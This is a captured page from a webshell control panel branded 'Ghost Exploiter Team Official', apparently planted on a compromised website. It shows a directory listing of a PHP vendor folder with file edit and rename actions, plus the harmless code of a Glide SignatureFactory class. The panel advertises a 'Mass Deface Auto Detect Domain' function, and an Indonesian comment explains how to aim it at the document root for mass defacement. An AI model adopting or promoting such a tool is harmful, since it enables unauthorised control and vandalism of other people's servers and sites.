webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
league
/
glide
/
src
/
Signatures
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Signature.php
1.79KB
edt
ren
SignatureException.php
0.104KB
edt
ren
SignatureFactory.php
0.348KB
edt
ren
SignatureInterface.php
0.619KB
edt
ren
<?php namespace League\Glide\Signatures; class SignatureFactory { /** * Create HttpSignature instance. * * @param string $signKey Secret key used to generate signature. * * @return Signature The HttpSignature instance. */ public static function create($signKey) { return new Signature($signKey); } }